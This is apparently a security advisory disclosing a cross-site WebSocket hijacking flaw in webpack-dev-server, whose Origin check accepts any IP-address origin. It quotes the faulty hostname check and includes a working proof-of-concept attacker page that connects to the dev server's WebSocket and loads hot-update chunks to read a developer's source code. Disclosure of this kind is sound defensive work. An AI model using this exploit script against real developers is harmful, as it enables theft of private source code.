Summary
Source code may be stolen when you access a malicious web site with a non-Chromium-based browser.
Details
The `Origin` header is checked to prevent Cross-site WebSocket hijacking, which was reported as CVE-2018-14732. But webpack-dev-server always allows IP address `Origin` headers.

webpack-dev-server/lib/Server.js, lines 3113 to 3127 in 55220a8:

```js
    // always allow requests with explicit IPv4 or IPv6-address.
    // A note on IPv6 addresses:
    // hostHeader will always contain the brackets denoting
    // an IPv6-address in URLs,
    // these are removed from the hostname in url.parse(),
    // so we have the pure IPv6-address in hostname.
    // For convenience, always allow localhost (hostname === 'localhost')
    // and its subdomains (hostname.endsWith(".localhost")).
    // allow hostname of listening address (hostname === this.options.host)
    const isValidHostname =
      (hostname !== null && ipaddr.IPv4.isValid(hostname)) ||
      (hostname !== null && ipaddr.IPv6.isValid(hostname)) ||
      hostname === "localhost" ||
      (hostname !== null && hostname.endsWith(".localhost")) ||
      hostname === this.options.host;
```
This allows a web site that is served on an IP address to connect to the WebSocket. Using the same method described in the article linked from CVE-2018-14732, the attacker gets the source code: the attacker page connects to the dev server's `/ws` endpoint, learns each compilation hash from the `hash` messages, and after the next `ok` message loads the corresponding `*.hot-update.js` chunk as a `<script>` (which is not subject to CORS); the chunk calls back into the page with the updated module source.

Related commit: 72efaab (note that the `checkHost` function was only used for the `Host` header to prevent DNS rebinding attacks, so that change itself is fine).

This vulnerability does not affect Chrome 94+ (and other Chromium-based browsers) because of the non-HTTPS private network access blocking feature, which stops a non-HTTPS page from making requests to private network addresses. Users of other browsers remain exposed.
PoC
- Download reproduction.zip and extract it
- Run `npm i`
- Run `npx webpack-dev-server`
- Open `http://{ipaddress}/?target=http://localhost:8080&file=main` with a non-Chromium browser (I used Firefox 134.0.1)
- Edit `src/index.js` in the extracted directory
- You can see the content of `src/index.js`

The script on the PoC site is:

```js
// Called by the hot-update chunk once it has loaded: args[1] maps module ids
// to their updated source, which the page dumps into the document body.
window.webpackHotUpdate = (...args) => {
  console.log(...args);
  for (const i in args[1]) {
    document.body.innerText = args[1][i].toString() + document.body.innerText;
    console.log(args[1][i]);
  }
};

// The target dev server and chunk name come from the query string, e.g.
// ?target=http://localhost:8080&file=main
const params = new URLSearchParams(window.location.search);
const target = new URL(params.get('target') || 'http://127.0.0.1:8080');
const file = params.get('file');
const wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
const wsPort = target.port;
// The dev server announces the new compilation hash before sending "ok";
// the hot-update file is named after the previous hash, so keep both.
let currentHash = '';
let currentHash2 = '';
const wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;

// Cross-origin WebSocket to the dev server. The browser sends this page's
// origin as the Origin header; because the page is served from an IP
// address, the dev server's check accepts it.
const ws = new WebSocket(wsTarget);
ws.onmessage = (event) => {
  console.log(event.data);
  if (event.data.match('"type":"ok"')) {
    // After "ok", load the hot-update chunk for the previous hash as a
    // script (not subject to CORS); it executes and calls webpackHotUpdate.
    const s = document.createElement('script');
    s.src = `${target}${file}.${currentHash2}.hot-update.js`;
    document.body.appendChild(s);
  }
  // Each "hash" message carries a 20-hex-digit compilation hash.
  const r = event.data.match(/"([0-9a-f]{20})"/);
  if (r !== null) {
    currentHash2 = currentHash;
    currentHash = r[1];
    console.log(currentHash, currentHash2);
  }
};
```
Impact
This vulnerability can result in source code being stolen from users who run the dev server on a predictable port and browse with a non-Chromium-based browser.